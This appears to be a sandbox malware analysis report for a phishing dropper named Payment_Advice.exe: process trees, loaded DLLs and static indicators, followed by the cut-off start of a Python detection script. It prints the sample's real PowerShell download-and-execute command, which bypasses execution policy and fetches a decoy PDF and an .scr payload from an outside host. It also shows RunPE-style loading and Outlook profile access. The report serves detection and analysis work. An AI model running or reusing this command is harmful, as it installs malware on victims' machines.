            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1700,i,16204253092957558570,3256571588782708314,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Temp\hadvices.scr "C:\Windows\Temp\hadvices.scr" /S
            Source: C:\Windows\Temp\hadvices.scr | Process created: C:\Windows\Temp\hadvices.scr "C:\Windows\Temp\hadvices.scr"
            Source: C:\Users\user\Desktop\Payment_Advice.exe | Process created: C:\Users\user\Desktop\Payment_Advice.exe "C:\Users\user\Desktop\Payment_Advice.exe"
            Source: C:\Users\user\Desktop\Payment_Advice.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Payment_Advice.pdf"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Temp\hadvices.scr "C:\Windows\Temp\hadvices.scr" /S
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1700,i,16204253092957558570,3256571588782708314,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
            Source: C:\Windows\Temp\hadvices.scr | Process created: C:\Windows\Temp\hadvices.scr "C:\Windows\Temp\hadvices.scr"
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Section loaded: sfc_os.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: mscoree.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: apphelp.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: kernel.appcore.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: version.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: uxtheme.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: wldp.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: amsi.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: userenv.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: profapi.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: msasn1.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: gpapi.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: cryptsp.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: rsaenh.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: cryptbase.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: windows.storage.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: mscoree.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: kernel.appcore.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: version.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: uxtheme.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: windows.storage.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: wldp.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: profapi.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: cryptsp.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: rsaenh.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: cryptbase.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: rasapi32.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: rasman.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: rtutils.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: mswsock.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: winhttp.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: iphlpapi.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: dhcpcsvc.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: dnsapi.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: winnsi.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: rasadhlp.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: fwpuclnt.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: secur32.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: sspicli.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: schannel.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: mskeyprotect.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: ntasn1.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: ncrypt.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: ncryptsslp.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: msasn1.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: gpapi.dll
Source: C:\Windows\Temp\hadvices.scr | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Payment_Advice.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Payment_Advice.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Temp\hadvices.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Payment_Advice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Payment_Advice.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb | source: Payment_Advice.exe, 00000000.00000002.1199149404.00000000057B0000.00000004.08000000.00040000.00000000.sdmp, Payment_Advice.exe, 00000000.00000002.1198385946.0000000003011000.00000004.00000800.00020000.00000000.sdmp, hadvices.scr, 00000017.00000002.1414670213.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \/.dll.pdb | source: Payment_Advice.exe, hadvices.scr.4.dr

Data Obfuscation

Source: Payment_Advice.exe, --j.cs | .Net Code: LoadLocalizedGrammarFromType
Source: Payment_Advice.exe, --j.cs | .Net Code: LoadGrammarFromAssembly
Source: Payment_Advice.exe, --.cs | .Net Code: CheckAssembly System.Reflection.Assembly.Load(byte[])
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'"
Source: Payment_Advice.exe | Static PE information: 0xDD330B0C [Thu Aug 7 15:51:40 2087 UTC]
Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 2_2_0040A3D2 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary, 2_2_0040A3D2
Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 2_2_00414426 push cs; iretd 2_2_004143FA
Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 2_2_004145D6 push ebx; ret 2_2_004145D7
Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 2_2_00414324 push cs; iretd 2_2_004143FA
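The wscript.exe to powershell.exe command line in the Data Obfuscation block is the delivery stage of this sample: execution policy bypassed, two Invoke-WebRequest downloads, each followed by Start-Process, with the decoy PDF opened from C:\Users\Public and the hadvices.scr payload launched from C:\Windows\Temp. The Python below is an added example, not part of the Joe Sandbox report or of the sample; it parses process-creation lines in the report's own "Source: ... Process created: ..." shape and scores that download-and-execute pattern. The sample lines are constructed from the two command lines shown in this section plus one benign control line; the script-host list, the drop-directory list, the severity thresholds and all helper names are the example's own choices.

```python
import re
from pathlib import PureWindowsPath

# Parents that should rarely spawn PowerShell, and world-writable locations that
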